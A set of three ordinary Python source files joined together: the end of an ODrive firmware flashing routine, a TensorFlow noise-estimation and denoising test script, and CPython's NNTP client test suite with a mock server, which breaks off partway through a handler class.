newest firmware for the device is downloaded from GitHub releases. """ if isinstance(device, usb.core.Device): serial_number = device.serial_number dfudev = DfuDevice(device) if (logger._verbose): logger.debug("OTP:") dump_otp(dfudev) # Read hardware version from one-time-programmable memory otp_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7800][0] otp_data = dfudev.read_sector(otp_sector) if otp_data[0] == 0: otp_data = otp_data[16:] if otp_data[0] == 0xfe: hw_version = (otp_data[3], otp_data[4], otp_data[5]) else: hw_version = (0, 0, 0) else: serial_number = device.__channel__.usb_device.serial_number dfudev = None # Read hardware version as reported from firmware hw_version_major = device.hw_version_major if hasattr(device, 'hw_version_major') else 0 hw_version_minor = device.hw_version_minor if hasattr(device, 'hw_version_minor') else 0 hw_version_variant = device.hw_version_variant if hasattr(device, 'hw_version_variant') else 0 hw_version = (hw_version_major, hw_version_minor, hw_version_variant) if hw_version < (3, 5, 0): print(" DFU mode is not supported on board version 3.4 or earlier.") print(" This is because entering DFU mode on such a device would") print(" break the brake resistor FETs under some circumstances.") print("Warning: DFU mode is not supported on ODrives earlier than v3.5 unless you perform a hardware mod.") if not odrive.utils.yes_no_prompt("Do you still want to continue?", False): raise OperationAbortedException() fw_version_major = device.fw_version_major if hasattr(device, 'fw_version_major') else 0 fw_version_minor = device.fw_version_minor if hasattr(device, 'fw_version_minor') else 0 fw_version_revision = device.fw_version_revision if hasattr(device, 'fw_version_revision') else 0 fw_version_prerelease = device.fw_version_prerelease if hasattr(device, 'fw_version_prerelease') else True fw_version = (fw_version_major, fw_version_minor, fw_version_revision, fw_version_prerelease) print("Found ODrive {} ({}) with firmware {}{}".format( serial_number, get_hw_version_string(hw_version), get_fw_version_string(fw_version), " in DFU mode" if dfudev is not None else "")) if firmware is None: if hw_version == (0, 0, 0): if dfudev is None: suggestion = 'You have to manually flash an up-to-date firmware to make automatic checks work. Run `odrivetool dfu --help` for more info.' else: suggestion = 'Run "make write_otp" to program the board version.' raise Exception('Cannot check online for new firmware because the board version is unknown. ' + suggestion) print("Checking online for newest firmware...", end='') firmware = get_newest_firmware(hw_version) if firmware is None: raise Exception("could not find any firmware release for this board version") print(" found {}".format(get_fw_version_string(firmware.fw_version))) if firmware.fw_version <= fw_version: print() if firmware.fw_version < fw_version: print("Warning: you are about to flash firmware {} which is older than the firmware on the device ({}).".format( get_fw_version_string(firmware.fw_version), get_fw_version_string(fw_version))) else: print("You are about to flash firmware {} which is the same version as the firmware on the device ({}).".format( get_fw_version_string(firmware.fw_version), get_fw_version_string(fw_version))) if not odrive.utils.yes_no_prompt("Do you want to flash this firmware anyway?", False): raise OperationAbortedException() # load hex file # TODO: Either use the elf format or pack a custom format with a manifest. # This way we can for instance verify the target board version and only # have to publish one file for every board (instead of elf AND hex files). hexfile = IntelHex(firmware.get_as_hex()) logger.debug("Contiguous segments in hex file:") for start, end in hexfile.segments(): logger.debug(" {:08X} to {:08X}".format(start, end - 1)) # Back up configuration if dfudev is None: did_backup_config = device.user_config_loaded if hasattr(device, 'user_config_loaded') else False if did_backup_config: odrive.configuration.backup_config(device, None, logger) elif not odrive.utils.yes_no_prompt("The configuration cannot be backed up because the device is already in DFU mode. The configuration may be lost after updating. Do you want to continue anyway?", True): raise OperationAbortedException() # Put the device into DFU mode if it's not already in DFU mode if dfudev is None: find_odrive_cancellation_token = Event(cancellation_token) put_into_dfu_mode(device, find_odrive_cancellation_token) stm_device = find_device_in_dfu_mode(serial_number, cancellation_token) find_odrive_cancellation_token.set() dfudev = DfuDevice(stm_device) logger.debug("Sectors on device: ") for sector in dfudev.sectors: logger.debug(" {:08X} to {:08X} ({})".format( sector['addr'], sector['addr'] + sector['len'] - 1, sector['name'])) # fill sectors with data touched_sectors = list(populate_sectors(dfudev.sectors, hexfile)) logger.debug("The following sectors will be flashed: ") for sector,_ in touched_sectors: logger.debug(" {:08X} to {:08X}".format(sector['addr'], sector['addr'] + sector['len'] - 1)) # Erase try: for i, (sector, data) in enumerate(touched_sectors): print("Erasing... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True) dfudev.erase_sector(sector) print('Erasing... done \r', end='', flush=True) finally: print('', flush=True) # Flash try: for i, (sector, data) in enumerate(touched_sectors): print("Flashing... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True) dfudev.write_sector(sector, data) print('Flashing... done \r', end='', flush=True) finally: print('', flush=True) # Verify try: for i, (sector, expected_data) in enumerate(touched_sectors): print("Verifying... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True) observed_data = dfudev.read_sector(sector) mismatch_pos = get_first_mismatch_index(observed_data, expected_data) if not mismatch_pos is None: mismatch_pos -= mismatch_pos % 16 observed_snippet = ' '.join('{:02X}'.format(x) for x in observed_data[mismatch_pos:mismatch_pos+16]) expected_snippet = ' '.join('{:02X}'.format(x) for x in expected_data[mismatch_pos:mismatch_pos+16]) raise RuntimeError("Verification failed around address 0x{:08X}:\n".format(sector['addr'] + mismatch_pos) + " expected: " + expected_snippet + "\n" " observed: " + observed_snippet) print('Verifying... done \r', end='', flush=True) finally: print('', flush=True) # If the flash operation failed for some reason, your device is bricked now. # You can unbrick it as long as the device remains powered on. # (or always with an STLink) # So for debugging you should comment this last part out. # Jump to application dfudev.jump_to_application(0x08000000) logger.info("Waiting for the device to reappear...") device = odrive.find_any("usb", serial_number, cancellation_token, cancellation_token, timeout=30) if did_backup_config: odrive.configuration.restore_config(device, None, logger) os.remove(odrive.configuration.get_temp_config_filename(device)) logger.success("Device firmware update successful.") def launch_dfu(args, logger, cancellation_token): """ Waits for a device that matches args.path and args.serial_number and then upgrades the device's firmware. """ serial_number = args.serial_number find_odrive_cancellation_token = Event(cancellation_token) logger.info("Waiting for ODrive...") devices = [None, None] # Start background thread to scan for ODrives in DFU mode def find_device_in_dfu_mode_thread(): devices[0] = find_device_in_dfu_mode(serial_number, find_odrive_cancellation_token) find_odrive_cancellation_token.set() threading.Thread(target=find_device_in_dfu_mode_thread).start() # Scan for ODrives not in DFU mode # We only scan on USB because DFU is only implemented over USB devices[1] = odrive.find_any("usb", serial_number, find_odrive_cancellation_token, cancellation_token) find_odrive_cancellation_token.set() device = devices[0] or devices[1] firmware = FirmwareFromFile(args.file) if args.file else None update_device(device, firmware, logger, cancellation_token) # Note: the flashed image can be verified using: (0x12000 is the number of bytes to read) # $ openocd -f interface/stlink-v2.cfg -f target/stm32f4x.cfg -c init -c flash\ read_bank\ 0\ image.bin\ 0\ 0x12000 -c exit # $ hexdump -C image.bin > image.bin.txt # # If you compare this with a reference image that was flashed with the STLink, you will see # minor differences. This is because this script fills undefined sections with 0xff. # $ diff image_ref.bin.txt image.bin.txt # 21c21 # < * # --- # > 00000180 d9 47 00 08 d9 47 00 08 ff ff ff ff ff ff ff ff |.G...G..........| # 2553c2553 # < 00009fc0 9e 46 70 47 00 00 00 00 52 20 96 3c 46 76 50 76 |.FpG....R .<FvPv| # --- # > 00009fc0 9e 46 70 47 ff ff ff ff 52 20 96 3c 46 76 50 76 |.FpG....R .<FvPv|
test_drne_and_dn.py
# coding=utf8 # Author: TomHeaven, hanlin_tan@nudt.edu.cn, 2017.08.19 from __future__ import print_function from tensorflow.contrib.layers import conv2d, avg_pool2d import tensorflow as tf import numpy as np from data_v3 import DatabaseCreator import time import tqdm import cv2 import re import os import argparse import h5py from multiprocessing import Process # options DEBUG = False from model_noise_estimation_w64d16_v2_sigma0_30 import Estimator from drdd_dn_sigma0_50 import DeepProcesser def test_estimate(input_folder, modelPath, feature_dim, depth, device): """ Denoise noisy images using Estimator class with pre-trained model. :param modelPath: path to save trained model :param feature_dim: width of the DNN :param depth: depth of the DNN :param device: which GPU to use (for machines with multiple GPUs, this avoid taking up all GPUs) :param noise: standard variation of noise of the tested images :return: """ os.environ['CUDA_VISIBLE_DEVICES'] = device estimator = Estimator(batchSize=1, feature_dim=feature_dim, depth=depth) regexp = re.compile(r'.*\.(%s)' % '(jpg)|(png)|(bmp)|(tif)') #input_folder = 'data/mcm' psize = 250 max_value = 255.0 crop = 0 n = 0 avg_en = 0 outFile = h5py.File('data/ne_res.h5', "w") for d, dirs, files in os.walk(input_folder): for f in files: if regexp.match(f): print('image', n, f) image = cv2.imread(os.path.join(d, f)) #image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY) if DEBUG: print ('image.shape : ', image.shape) if n == 0: xshape = [psize, psize, 3] yshape = [psize, psize, 3] estimator.load_model(modelPath, batchSize=1, xshape = xshape, yshape=yshape) image = image / max_value R, runtime = estimator.denoise_bayer(image, psize, crop) estimated_noise = np.mean(np.mean(np.mean(R, axis=0), axis=0), axis=0) if DEBUG: print('max value = ', np.max(np.abs(R))) print('time : ', runtime, ' ms') outFile.create_dataset('noise_estimation_%d' % n, data=np.mean(R, axis=2), compression='gzip') #outFile.create_dataset('runtime_%d' % n, data=R * 255, compression='gzip') print('estimate_noise : ', estimated_noise * 255.0) n += 1 avg_en += estimated_noise outFile.close() print('avg_en : ', avg_en / n * 255.0) estimator.sess.close() def test_denoise(input_folder, output_folder, model_dir, block_num, width, block_depth, device): ## denoise os.environ['CUDA_VISIBLE_DEVICES'] = device deepProcesser = DeepProcesser(block_num=block_num, width=width, block_depth=block_depth, use_scalar_noise=False) deepProcesser.load_model(model_dir, False) regexp = re.compile(r'.*\.(%s)' % '(tif|tiff|jpg|png)') if not os.path.isdir(output_folder): os.mkdir(output_folder) psize = 250 max_value = 255.0 crop = 0 n = 0 nl_file = h5py.File('data/ne_res.h5', "r") for d, dirs, files in os.walk(input_folder): for f in files: if regexp.match(f): print('image', n, f) image = cv2.imread(os.path.join(d, f)) if DEBUG: print('image.shape : ', image.shape) image = image / max_value noise = nl_file['noise_estimation_%d' % n].value #print('noise.shape : ', noise.shape) #noise = noise.transpose(2, 0, 1) noise = noise[np.newaxis, np.newaxis, ...] R, runtime = deepProcesser.test(image, noise, psize, crop) out = np.uint8(R * 255 + 0.5) # R = swap_blue_red(R) if DEBUG: print('max value = ', np.max(np.abs(R))) print('time : ', runtime, ' ms') cv2.imwrite(os.path.join(output_folder, f), out) n += 1 if __name__ == '__main__': ## configuration device = '1' # datasets: 'kodak', 'mcm', 'bsd500' sigma 5, 15, 25 datasets = ['kodak', 'mcm', 'bsd500'] #sigmas = [5, 15, 25] sigmas = [15] for d in datasets: print(' Dataset : ', d) for s in sigmas: print(' Sigma : ', s) input_folder = 'data/%s_sigma%d' % (d, s) output_folder= 'res/drne+dn/%s_sigma%d' % (d, s) # estimation modelPath = 'ne_w64d16_v2_sigma0_30' width = 64 depth = 16 - 4 minNoiseLevel = 0.0 / 255.0 maxNoiseLevel = 30.0 / 255.0 #### end configuration # 用子进程启动 Tensorflow,退出时可完全释放显存 p = Process(target=test_estimate, args=(input_folder, 'models/%s' % modelPath, width, depth, device)) p.start() p.join() # this blocks until the process terminates #test_estimate(input_folder, 'models/%s' % modelPath, width, depth=depth, device=device) # denoise modelPath = 'dn_sigma0_50' block_num = 5 block_depth = 4 width = 64 # 用子进程启动 Pytorch,退出时可完全释放显存 p = Process(target=test_denoise, args=(input_folder, output_folder, 'models/%s' % modelPath, block_num, width, block_depth, device)) p.start() p.join() # this blocks until the process terminates #test_denoise(input_folder, output_folder, 'models/%s' % modelPath, block_num, width, block_depth, device=device)
test_nntplib.py
import io import socket import datetime import textwrap import unittest import functools import contextlib import os.path import threading from test import support from nntplib import NNTP, GroupInfo import nntplib from unittest.mock import patch try: import ssl except ImportError: ssl = None TIMEOUT = 30 certfile = os.path.join(os.path.dirname(__file__), 'keycert3.pem') # TODO: # - test the `file` arg to more commands # - test error conditions # - test auth and `usenetrc` class NetworkedNNTPTestsMixin: def test_welcome(self): welcome = self.server.getwelcome() self.assertEqual(str, type(welcome)) def test_help(self): resp, lines = self.server.help() self.assertTrue(resp.startswith("100 "), resp) for line in lines: self.assertEqual(str, type(line)) def test_list(self): resp, groups = self.server.list() if len(groups) > 0: self.assertEqual(GroupInfo, type(groups[0])) self.assertEqual(str, type(groups[0].group)) def test_list_active(self): resp, groups = self.server.list(self.GROUP_PAT) if len(groups) > 0: self.assertEqual(GroupInfo, type(groups[0])) self.assertEqual(str, type(groups[0].group)) def test_unknown_command(self): with self.assertRaises(nntplib.NNTPPermanentError) as cm: self.server._shortcmd("XYZZY") resp = cm.exception.response self.assertTrue(resp.startswith("500 "), resp) def test_newgroups(self): # gmane gets a constant influx of new groups. In order not to stress # the server too much, we choose a recent date in the past. dt = datetime.date.today() - datetime.timedelta(days=7) resp, groups = self.server.newgroups(dt) if len(groups) > 0: self.assertIsInstance(groups[0], GroupInfo) self.assertIsInstance(groups[0].group, str) def test_description(self): def _check_desc(desc): # Sanity checks self.assertIsInstance(desc, str) self.assertNotIn(self.GROUP_NAME, desc) desc = self.server.description(self.GROUP_NAME) _check_desc(desc) # Another sanity check self.assertIn("Python", desc) # With a pattern desc = self.server.description(self.GROUP_PAT) _check_desc(desc) # Shouldn't exist desc = self.server.description("zk.brrtt.baz") self.assertEqual(desc, '') def test_descriptions(self): resp, descs = self.server.descriptions(self.GROUP_PAT) # 215 for LIST NEWSGROUPS, 282 for XGTITLE self.assertTrue( resp.startswith("215 ") or resp.startswith("282 "), resp) self.assertIsInstance(descs, dict) desc = descs[self.GROUP_NAME] self.assertEqual(desc, self.server.description(self.GROUP_NAME)) def test_group(self): result = self.server.group(self.GROUP_NAME) self.assertEqual(5, len(result)) resp, count, first, last, group = result self.assertEqual(group, self.GROUP_NAME) self.assertIsInstance(count, int) self.assertIsInstance(first, int) self.assertIsInstance(last, int) self.assertLessEqual(first, last) self.assertTrue(resp.startswith("211 "), resp) def test_date(self): resp, date = self.server.date() self.assertIsInstance(date, datetime.datetime) # Sanity check self.assertGreaterEqual(date.year, 1995) self.assertLessEqual(date.year, 2030) def _check_art_dict(self, art_dict): # Some sanity checks for a field dictionary returned by OVER / XOVER self.assertIsInstance(art_dict, dict) # NNTP has 7 mandatory fields self.assertGreaterEqual(art_dict.keys(), {"subject", "from", "date", "message-id", "references", ":bytes", ":lines"} ) for v in art_dict.values(): self.assertIsInstance(v, (str, type(None))) def test_xover(self): resp, count, first, last, name = self.server.group(self.GROUP_NAME) resp, lines = self.server.xover(last - 5, last) if len(lines) == 0: self.skipTest("no articles retrieved") # The 'last' article is not necessarily part of the output (cancelled?) art_num, art_dict = lines[0] self.assertGreaterEqual(art_num, last - 5) self.assertLessEqual(art_num, last) self._check_art_dict(art_dict) @unittest.skipIf(True, 'temporarily skipped until a permanent solution' ' is found for issue #28971') def test_over(self): resp, count, first, last, name = self.server.group(self.GROUP_NAME) start = last - 10 # The "start-" article range form resp, lines = self.server.over((start, None)) art_num, art_dict = lines[0] self._check_art_dict(art_dict) # The "start-end" article range form resp, lines = self.server.over((start, last)) art_num, art_dict = lines[-1] # The 'last' article is not necessarily part of the output (cancelled?) self.assertGreaterEqual(art_num, start) self.assertLessEqual(art_num, last) self._check_art_dict(art_dict) # XXX The "message_id" form is unsupported by gmane # 503 Overview by message-ID unsupported def test_xhdr(self): resp, count, first, last, name = self.server.group(self.GROUP_NAME) resp, lines = self.server.xhdr('subject', last) for line in lines: self.assertEqual(str, type(line[1])) def check_article_resp(self, resp, article, art_num=None): self.assertIsInstance(article, nntplib.ArticleInfo) if art_num is not None: self.assertEqual(article.number, art_num) for line in article.lines: self.assertIsInstance(line, bytes) # XXX this could exceptionally happen... self.assertNotIn(article.lines[-1], (b".", b".\n", b".\r\n")) @unittest.skipIf(True, "FIXME: see bpo-32128") def test_article_head_body(self): resp, count, first, last, name = self.server.group(self.GROUP_NAME) # Try to find an available article for art_num in (last, first, last - 1): try: resp, head = self.server.head(art_num) except nntplib.NNTPTemporaryError as e: if not e.response.startswith("423 "): raise # "423 No such article" => choose another one continue break else: self.skipTest("could not find a suitable article number") self.assertTrue(resp.startswith("221 "), resp) self.check_article_resp(resp, head, art_num) resp, body = self.server.body(art_num) self.assertTrue(resp.startswith("222 "), resp) self.check_article_resp(resp, body, art_num) resp, article = self.server.article(art_num) self.assertTrue(resp.startswith("220 "), resp) self.check_article_resp(resp, article, art_num) # Tolerate running the tests from behind a NNTP virus checker blacklist = lambda line: line.startswith(b'X-Antivirus') filtered_head_lines = [line for line in head.lines if not blacklist(line)] filtered_lines = [line for line in article.lines if not blacklist(line)] self.assertEqual(filtered_lines, filtered_head_lines + [b''] + body.lines) def test_capabilities(self): # The server under test implements NNTP version 2 and has a # couple of well-known capabilities. Just sanity check that we # got them. def _check_caps(caps): caps_list = caps['LIST'] self.assertIsInstance(caps_list, (list, tuple)) self.assertIn('OVERVIEW.FMT', caps_list) self.assertGreaterEqual(self.server.nntp_version, 2) _check_caps(self.server.getcapabilities()) # This re-emits the command resp, caps = self.server.capabilities() _check_caps(caps) def test_zlogin(self): # This test must be the penultimate because further commands will be # refused. baduser = "notarealuser" badpw = "notarealpassword" # Check that bogus credentials cause failure self.assertRaises(nntplib.NNTPError, self.server.login, user=baduser, password=badpw, usenetrc=False) # FIXME: We should check that correct credentials succeed, but that # would require valid details for some server somewhere to be in the # test suite, I think. Gmane is anonymous, at least as used for the # other tests. def test_zzquit(self): # This test must be called last, hence the name cls = type(self) try: self.server.quit() finally: cls.server = None @classmethod def wrap_methods(cls): # Wrap all methods in a transient_internet() exception catcher # XXX put a generic version in test.support? def wrap_meth(meth): @functools.wraps(meth) def wrapped(self): with support.transient_internet(self.NNTP_HOST): meth(self) return wrapped for name in dir(cls): if not name.startswith('test_'): continue meth = getattr(cls, name) if not callable(meth): continue # Need to use a closure so that meth remains bound to its current # value setattr(cls, name, wrap_meth(meth)) def test_with_statement(self): def is_connected(): if not hasattr(server, 'file'): return False try: server.help() except (OSError, EOFError): return False return True with self.NNTP_CLASS(self.NNTP_HOST, timeout=TIMEOUT, usenetrc=False) as server: self.assertTrue(is_connected()) self.assertTrue(server.help()) self.assertFalse(is_connected()) with self.NNTP_CLASS(self.NNTP_HOST, timeout=TIMEOUT, usenetrc=False) as server: server.quit() self.assertFalse(is_connected()) NetworkedNNTPTestsMixin.wrap_methods() EOF_ERRORS = (EOFError,) if ssl is not None: EOF_ERRORS += (ssl.SSLEOFError,) class NetworkedNNTPTests(NetworkedNNTPTestsMixin, unittest.TestCase): # This server supports STARTTLS (gmane doesn't) NNTP_HOST = 'news.trigofacile.com' GROUP_NAME = 'fr.comp.lang.python' GROUP_PAT = 'fr.comp.lang.*' NNTP_CLASS = NNTP @classmethod def setUpClass(cls): support.requires("network") with support.transient_internet(cls.NNTP_HOST): try: cls.server = cls.NNTP_CLASS(cls.NNTP_HOST, timeout=TIMEOUT, usenetrc=False) except EOF_ERRORS: raise unittest.SkipTest(f"{cls} got EOF error on connecting " f"to {cls.NNTP_HOST!r}") @classmethod def tearDownClass(cls): if cls.server is not None: cls.server.quit() @unittest.skipUnless(ssl, 'requires SSL support') class NetworkedNNTP_SSLTests(NetworkedNNTPTests): # Technical limits for this public NNTP server (see http://www.aioe.org): # "Only two concurrent connections per IP address are allowed and # 400 connections per day are accepted from each IP address." NNTP_HOST = 'nntp.aioe.org' GROUP_NAME = 'comp.lang.python' GROUP_PAT = 'comp.lang.*' NNTP_CLASS = getattr(nntplib, 'NNTP_SSL', None) # Disabled as it produces too much data test_list = None # Disabled as the connection will already be encrypted. test_starttls = None # # Non-networked tests using a local server (or something mocking it). # class _NNTPServerIO(io.RawIOBase): """A raw IO object allowing NNTP commands to be received and processed by a handler. The handler can push responses which can then be read from the IO object.""" def __init__(self, handler): io.RawIOBase.__init__(self) # The channel from the client self.c2s = io.BytesIO() # The channel to the client self.s2c = io.BytesIO() self.handler = handler self.handler.start(self.c2s.readline, self.push_data) def readable(self): return True def writable(self): return True def push_data(self, data): """Push (buffer) some data to send to the client.""" pos = self.s2c.tell() self.s2c.seek(0, 2) self.s2c.write(data) self.s2c.seek(pos) def write(self, b): """The client sends us some data""" pos = self.c2s.tell() self.c2s.write(b) self.c2s.seek(pos) self.handler.process_pending() return len(b) def readinto(self, buf): """The client wants to read a response""" self.handler.process_pending() b = self.s2c.read(len(buf)) n = len(b) buf[:n] = b return n def make_mock_file(handler): sio = _NNTPServerIO(handler) # Using BufferedRWPair instead of BufferedRandom ensures the file # isn't seekable. file = io.BufferedRWPair(sio, sio) return (sio, file) class MockedNNTPTestsMixin: # Override in derived classes handler_class = None def setUp(self): super().setUp() self.make_server() def tearDown(self): super().tearDown() del self.server def make_server(self, *args, **kwargs): self.handler = self.handler_class() self.sio, file = make_mock_file(self.handler) self.server = nntplib._NNTPBase(file, 'test.server', *args, **kwargs) return self.server class MockedNNTPWithReaderModeMixin(MockedNNTPTestsMixin): def setUp(self): super().setUp() self.make_server(readermode=True) class NNTPv1Handler: """A handler for RFC 977""" welcome = "200 NNTP mock server" def start(self, readline, push_data): self.in_body = False self.allow_posting = True self._readline = readline self._push_data = push_data self._logged_in = False self._user_sent = False # Our welcome self.handle_welcome() def _decode(self, data): return str(data, "utf-8", "surrogateescape") def process_pending(self): if self.in_body: while True: line = self._readline() if not line: return self.body.append(line) if line == b".\r\n": break try: meth, tokens = self.body_callback meth(*tokens, body=self.body) finally: self.body_callback = None self.body = None self.in_body = False while True: line = self._decode(self._readline()) if not line: return if not line.endswith("\r\n"): raise ValueError("line doesn't end with \\r\\n: {!r}".format(line)) line = line[:-2] cmd, *tokens = line.split() #meth = getattr(self.handler, "handle_" + cmd.upper(), None) meth = getattr(self, "handle_" + cmd.upper(), None) if meth is None: self.handle_unknown() else: try: meth(*tokens) except Exception as e: raise ValueError("command failed: {!r}".format(line)) from e else: if self.in_body: self.body_callback = meth, tokens self.body = [] def expect_body(self): """Flag that the client is expected to post a request body""" self.in_body = True def push_data(self, data): """Push some binary data""" self._push_data(data) def push_lit(self, lit): """Push a string literal""" lit = textwrap.dedent(lit) lit = "\r\n".join(lit.splitlines()) + "\r\n" lit = lit.encode('utf-8') self.push_data(lit) def handle_unknown(self): self.push_lit("500 What?") def handle_welcome(self): self.push_lit(self.welcome) def handle_QUIT(self): self.push_lit("205 Bye!") def handle_DATE(self): self.push_lit("111 20100914001155") def handle_GROUP(self, group): if group == "fr.comp.lang.python": self.push_lit("211 486 761 1265 fr.comp.lang.python") else: self.push_lit("411 No such group {}".format(group)) def handle_HELP(self): self.push_lit("""\ 100 Legal commands authinfo user Name|pass Password|generic <prog> <args> date help Report problems to <root@example.org> .""") def handle_STAT(self, message_spec=None): if message_spec is None: self.push_lit("412 No newsgroup selected") elif message_spec == "3000234": self.push_lit("223 3000234 <45223423@example.com>") elif message_spec == "<45223423@example.com>": self.push_lit("223 0 <45223423@example.com>") else: self.push_lit("430 No Such Article Found") def handle_NEXT(self): self.push_lit("223 3000237 <668929@example.org> retrieved") def handle_LAST(self): self.push_lit("223 3000234 <45223423@example.com> retrieved") def handle_LIST(self, action=None, param=None): if action is None: self.push_lit("""\ 215 Newsgroups in form "group high low flags". comp.lang.python 0000052340 0000002828 y comp.lang.python.announce 0000001153 0000000993 m free.it.comp.lang.python 0000000002 0000000002 y fr.comp.lang.python 0000001254 0000000760 y free.it.comp.lang.python.learner 0000000000 0000000001 y tw.bbs.comp.lang.python 0000000304 0000000304 y .""") elif action == "ACTIVE": if param == "*distutils*": self.push_lit("""\ 215 Newsgroups in form "group high low flags" gmane.comp.python.distutils.devel 0000014104 0000000001 m gmane.comp.python.distutils.cvs 0000000000 0000000001 m .""") else: self.push_lit("""\ 215 Newsgroups in form "group high low flags" .""") elif action == "OVERVIEW.FMT": self.push_lit("""\ 215 Order of fields in overview database. Subject: From: Date: Message-ID: References: Bytes: Lines: Xref:full .""") elif action == "NEWSGROUPS": assert param is not None if param == "comp.lang.python": self.push_lit("""\ 215 Descriptions in form "group description". comp.lang.python\tThe Python computer language. .""") elif param == "comp.lang.python*": self.push_lit("""\ 215 Descriptions in form "group description". comp.lang.python.announce\tAnnouncements about the Python language. (Moderated) comp.lang.python\tThe Python computer language. .""") else: self.push_lit("""\ 215 Descriptions in form "group description". .""") else: self.push_lit('501 Unknown LIST keyword') def handle_NEWNEWS(self, group, date_str, time_str): # We hard code different return messages depending on passed # argument and date syntax. if (group == "comp.lang.python" and date_str == "20100913" and time_str == "082004"): # Date was passed in RFC 3977 format (NNTP "v2") self.push_lit("""\ 230 list of newsarticles (NNTP v2) created after Mon Sep 13 08:20:04 2010 follows <a4929a40-6328-491a-aaaf-cb79ed7309a2@q2g2000vbk.googlegroups.com> <f30c0419-f549-4218-848f-d7d0131da931@y3g2000vbm.googlegroups.com> .""") elif (group == "comp.lang.python" and date_str == "100913" and time_str == "082004"): # Date was passed in RFC 977 format (NNTP "v1") self.push_lit("""\ 230 list of newsarticles (NNTP v1) created after Mon Sep 13 08:20:04 2010 follows <a4929a40-6328-491a-aaaf-cb79ed7309a2@q2g2000vbk.googlegroups.com> <f30c0419-f549-4218-848f-d7d0131da931@y3g2000vbm.googlegroups.com> .""") elif (group == 'comp.lang.python' and date_str in ('20100101', '100101') and time_str == '090000'): self.push_lit('too long line' * 3000 + '\n.') else: self.push_lit("""\ 230 An empty list of newsarticles follows .""") # (Note for experiments: many servers disable NEWNEWS. # As of this writing, sicinfo3.epfl.ch doesn't.) def handle_XOVER(self, message_spec): if message_spec == "57-59": self.push_lit( "224 Overview information for 57-58 follows\n" "57\tRe: ANN: New Plone book with strong Python (and Zope) themes throughout" "\tDoug Hellmann <doug.hellmann-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>" "\tSat, 19 Jun 2010 18:04:08 -0400" "\t<4FD05F05-F98B-44DC-8111-C6009C925F0C@gmail.com>" "\t<hvalf7$ort$1@dough.gmane.org>\t7103\t16" "\tXref: news.gmane.org gmane.comp.python.authors:57" "\n" "58\tLooking for a few good bloggers" "\tDoug Hellmann <doug.hellmann-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>" "\tThu, 22 Jul 2010 09:14:14 -0400" "\t<A29863FA-F388-40C3-AA25-0FD06B09B5BF@gmail.com>" "\t\t6683\t16" "\t" "\n" # A UTF-8 overview line from fr.comp.lang.python "59\tRe: Message d'erreur incompréhensible (par moi)" "\tEric Brunel <eric.brunel@pragmadev.nospam.com>" "\tWed, 15 Sep 2010 18:09:15 +0200" "\t<eric.brunel-2B8B56.18091515092010@news.wanadoo.fr>" "\t<4c90ec87$0$32425$ba4acef3@reader.news.orange.fr>\t1641\t27" "\tXref: saria.nerim.net fr.comp.lang.python:1265" "\n" ".\n") else: self.push_lit("""\ 224 No articles .""") def handle_POST(self, *, body=None): if body is None: if self.allow_posting: self.push_lit("340 Input article; end with <CR-LF>.<CR-LF>") self.expect_body() else: self.push_lit("440 Posting not permitted") else: assert self.allow_posting self.push_lit("240 Article received OK") self.posted_body = body def handle_IHAVE(self, message_id, *, body=None): if body is None: if (self.allow_posting and message_id == "<i.am.an.article.you.will.want@example.com>"): self.push_lit("335 Send it; end with <CR-LF>.<CR-LF>") self.expect_body() else: self.push_lit("435 Article not wanted") else: assert self.allow_posting self.push_lit("235 Article transferred OK") self.posted_body = body sample_head = """\ From: "Demo User" <nobody@example.net> Subject: I am just a test article Content-Type: text/plain; charset=UTF-8; format=flowed Message-ID: <i.am.an.article.you.will.want@example.com>""" sample_body = """\ This is just a test article. ..Here is a dot-starting line. -- Signed by Andr\xe9.""" sample_article = sample_head + "\n\n" + sample_body def handle_ARTICLE(self, message_spec=None): if message_spec is None: self.push_lit("220 3000237 <45223423@example.com>") elif message_spec == "<45223423@example.com>": self.push_lit("220 0 <45223423@example.com>") elif message_spec == "3000234": self.push_lit("220 3000234 <45223423@example.com>") else: self.push_lit("430 No Such Article Found") return self.push_lit(self.sample_article) self.push_lit(".") def handle_HEAD(self, message_spec=None): if message_spec is None: self.push_lit("221 3000237 <45223423@example.com>") elif message_spec == "<45223423@example.com>": self.push_lit("221 0 <45223423@example.com>") elif message_spec == "3000234": self.push_lit("221 3000234 <45223423@example.com>") else: self.push_lit("430 No Such Article Found") return self.push_lit(self.sample_head) self.push_lit(".") def handle_BODY(self, message_spec=None): if message_spec is None: self.push_lit("222 3000237 <45223423@example.com>") elif message_spec == "<45223423@example.com>": self.push_lit("222 0 <45223423@example.com>") elif message_spec == "3000234": self.push_lit("222 3000234 <45223423@example.com>") else: self.push_lit("430 No Such Article Found") return self.push_lit(self.sample_body) self.push_lit(".") def handle_AUTHINFO(self, cred_type, data): if self._logged_in: self.push_lit('502 Already Logged In') elif cred_type == 'user': if self._user_sent: self.push_lit('482 User Credential Already Sent') else: self.push_lit('381 Password Required') self._user_sent = True elif cred_type == 'pass': self.push_lit('281 Login Successful') self._logged_in = True else: raise Exception('Unknown cred type {}'.format(cred_type)) class NNTPv2Handler(NNTPv1Handler): """A handler for RFC 3977 (NNTP "v2")""" def handle_CAPABILITIES(self): fmt = """\ 101 Capability list: VERSION 2 3 IMPLEMENTATION INN 2.5.1{} HDR LIST ACTIVE ACTIVE.TIMES DISTRIB.PATS HEADERS NEWSGROUPS OVERVIEW.FMT OVER POST READER .""" if not self._logged_in: self.push_lit(fmt.format('\n AUTHINFO USER')) else: self.push_lit(fmt.format('')) def handle_MODE(self, _): raise Exception('MODE READER sent despite READER has been advertised') def handle_OVER(self, message_spec=None): return self.handle_XOVER(message_spec) class CapsAfterLoginNNTPv2Handler(NNTPv2Handler): """A handler that allows CAPABILITIES only after login""" def handle_CAPABILITIES(self): if not self._logged_in: self.push_lit('480 You must log in.') else: super().handle_CAPABILITIES() class ModeSwitchingNNTPv2Handler(NNTPv2Handler): """A server that starts in transit mode""" def __init__(self): self._switched = False def handle_CAPABILITIES(self): fmt = """\ 101 Capability list: VERSION 2 3 IMPLEMENTATION INN 2.5.1 HDR LIST ACTIVE ACTIVE.TIMES DISTRIB.PATS HEADERS 